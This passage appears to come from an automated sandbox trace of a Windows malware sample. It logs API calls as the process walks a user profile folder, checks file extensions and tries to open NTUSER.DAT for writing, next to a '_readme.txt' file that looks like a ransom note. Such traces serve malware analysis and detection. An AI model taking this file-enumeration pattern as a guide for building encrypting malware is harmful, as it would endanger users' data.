(HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318be0 [0097.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33185b0 [0097.306] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0097.307] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0097.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce7b8 [0097.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0097.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x16c) returned 0x9b94968 [0097.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318be0 [0097.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce6e8 [0097.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33185b0 [0097.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318d40 [0097.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318ea0 [0097.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce680 [0097.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0097.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0097.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33186b8 [0097.307] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x9fdfda30, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0x9fdfda30, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0097.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0097.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318298 [0097.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318138 [0097.307] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0097.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce7b8 [0097.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0097.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0097.307] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0097.307] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0097.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318298 [0097.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0097.308] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2c30f920, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2c30f920, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0097.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fb10 [0097.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce7b8 [0097.308] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT") returned=".DAT" [0097.308] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.308] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2c16ca00, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0097.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fb10 [0097.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce7b8 [0097.308] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned=".LOG1" [0097.308] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0097.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fb10 [0097.308] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce7b8 [0097.309] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG2") returned=".LOG2" [0097.309] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0097.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fb10 [0097.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3336ce0 [0097.309] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned=".blf" [0097.309] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0097.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fb10 [0097.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.309] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned=".regtrans-ms" [0097.309] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0097.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fb10 [0097.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.309] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned=".regtrans-ms" [0097.309] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0097.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fb10 [0097.309] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce7b8 [0097.310] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini") returned=".ini" [0097.310] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa04896b0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa04896b0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0097.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0097.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318298 [0097.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x214) returned 0x32d0958 [0097.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318d98 [0097.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce7b8 [0097.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x710e90 [0097.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x710ee8 [0097.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x9b9a968 [0097.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0097.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce750 [0097.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce410 [0097.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x9b9a9c0 [0097.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0097.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x9b9aa18 [0097.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce068 [0097.310] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x9b9aa70 [0097.311] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0097.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0097.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0097.311] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0097.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0097.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318298 [0097.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318138 [0097.311] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0097.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0097.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0097.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce618 [0097.311] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0097.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0097.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318298 [0097.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33186b8 [0097.311] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0097.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0097.311] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318298 [0097.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318ea0 [0097.312] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0097.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0097.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce5b0 [0097.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x310) returned 0x694598 [0097.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318e48 [0097.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce680 [0097.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318298 [0097.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318d40 [0097.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33185b0 [0097.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce6e8 [0097.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce340 [0097.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce478 [0097.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318be0 [0097.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce138 [0097.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x9b9aac8 [0097.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce4e0 [0097.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x9b9ab20 [0097.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x9b9ab78 [0097.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce1a0 [0097.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x9b9abd0 [0097.312] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce270 [0097.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x9b9ac28 [0097.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x9b9ac80 [0097.313] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0097.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318ea0 [0097.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0097.313] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa03f1130, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xa03f1130, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0097.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318ea0 [0097.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33186b8 [0097.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318138 [0097.313] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1b2ca60, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1b2ca60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1b2ca60, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0097.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fb10 [0097.313] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0097.313] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned=".txt" [0097.313] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1b2ca60, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa1b2ca60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1b2ca60, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0097.313] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0097.313] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.314] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0097.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.314] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.314] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0097.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.314] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.314] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0097.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0097.314] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0097.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.314] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0097.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0097.314] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 